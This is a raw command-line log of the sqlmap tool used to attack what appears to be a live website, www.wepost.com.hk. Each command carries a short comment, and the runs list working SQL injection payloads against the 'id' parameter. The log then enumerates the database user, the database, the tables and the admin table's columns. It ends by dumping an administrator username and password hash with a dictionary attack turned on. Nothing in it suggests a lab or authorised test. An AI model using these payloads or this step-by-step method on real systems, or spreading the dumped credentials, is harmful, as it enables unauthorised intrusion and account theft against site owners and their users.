D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14
D:\Python27\sqlmap>